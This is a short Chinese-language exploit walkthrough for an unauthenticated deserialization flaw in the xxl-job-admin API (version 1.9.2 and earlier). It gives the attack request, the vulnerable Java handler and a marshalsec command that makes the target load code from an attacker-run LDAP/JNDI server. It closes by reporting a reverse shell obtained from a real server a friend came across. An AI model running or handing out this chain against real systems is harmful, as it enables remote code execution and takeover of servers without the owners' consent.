利用条件:version <=1.9.2
POST /xxl-job-admin/api HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Android 9.0; Mobile; rv:66.0) Gecko/66.0 Firefox/66.0
Accept: application/xml, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Length: 702
Origin: http://127.0.0.1:8080
DNT: 1
Connection: close
Referer: http://127.0.0.1:8080/xxl-job-admin/
xxl-job-admin/api下存在未授权漏洞。
因为这两天研究过2.2.0的api接口,所以知道api类的接口都在com/xxl/job/admin/controller/JobApiController.java下,查看这下面的代码。
private RpcResponse doInvoke(HttpServletRequest request) {
try {
// deserialize request
byte[] requestBytes = HttpClientUtil.readBytes(request);
if (requestBytes == null || requestBytes.length==0) {
RpcResponse rpcResponse = new RpcResponse();
rpcResponse.setError("RpcRequest byte[] is null");
return rpcResponse;
}
RpcRequest rpcRequest = (RpcRequest) HessianSerializer.deserialize(requestBytes, RpcRequest.class);
// invoke
RpcResponse rpcResponse = NetComServerFactory.invokeService(rpcRequest, null);
return rpcResponse;
} catch (Exception e) {
logger.error(e.getMessage(), e);
RpcResponse rpcResponse = new RpcResponse();
rpcResponse.setError("Server-error:" + e.getMessage());
return rpcResponse;
}
}
简单粗暴,直接把body全部来反序列化了。
因为是HessianSerializer,所以使用marshalsec工具来进行反序列化。
记得用marshalsec的源码进行编译,修改pom.xml为1.9.2里一样的hessian和spring版本,以免有环境问题。
> java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor ldap://:7777/Exploit >dns4.dat
生成的dns4.dat可以收到dnslog日志。
如果出现下面的问题,有可能是对面服务器环境的java版本太新了,不能jndi了。
拿今天朋友遇到的一台服务器进行测试,自己的vps上起个jndi服务。
收到反弹的shell。
